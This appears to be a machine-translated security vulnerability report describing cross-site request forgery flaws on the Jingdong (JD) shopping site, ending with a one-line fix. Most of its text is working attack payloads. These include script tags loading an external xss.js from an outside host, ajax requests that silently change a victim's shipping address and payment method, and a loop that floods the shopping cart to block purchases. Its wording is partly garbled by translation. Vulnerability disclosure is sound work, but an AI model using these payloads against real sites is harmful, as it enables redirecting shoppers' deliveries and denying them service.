Many sensitive operations in Jingdong Mall are not verified

There are multiple CSRF, which can be modified in many ways.
1. Modify the shipping address. When there is only one shipping address in the account, many people do not pay attention to the shipping address and pay directly <script src = http://mmme.me/xss.js > </Script> xss. ajax (' http://trade.jd.com/consignee/saveConsignee.action ', "ConsigneeParam. id = 0 & consigneeParam. type = 1 & consigneeParam. name = xxxkkk & consigneeParam. provinceId = 15 & consigneeParam. cityId = 1158 & consigneeParam. countyId = 3413 & consigneeParam. townId = 46422 & consigneeParam. address = bbbbbbbbbbbbbb & consigneeParam. mobile = 13100000000 & consigneeParam. email = & consigneeParam. phone = & consigneeParam. provinceName = Zhejiang & consigneeParam. cityName = Ningbo & consigneeParam. countyName = Jiangdong District & consigneeParam. townName = Bai he Street & consigneeParam. commonConsigneeSize = 1 & consigneeParam. isUpdateCommonAddress = 1 ") </script>. modify the payment method, which has little impact on the change of payment method to cash on delivery, business days, weekends and holidays can be delivered <script src = http://mmme.me/xss.js > </Script> xss. ajax (' http://trade.jd.com/payAndShip/savePayAndShip.action ', 'Saveparam. paymentId = 1 & saveParam. jdShipmentType = 65 & saveParam. jdShipTime = 3 & saveParam. jdbeforenoworkflow = 0 & saveParam. jdPayWayId = 1') </script> 3. the shopping cart CSRF rejects services and CSRF fills the shopping cart. Normal shopping flows cannot be performed (ddos = function () {var I; for (I = 530000; I <= 532000; I ++) {xss. csrf (' http://gate.jd.com/InitCart.aspx?pcount=100000000&ptype=1&pid= '+ I) ;}}. call (this); the effect is as follows: normal shopping cannot be added to the shopping cart.

Solution:

Add a token to the form or verify the referer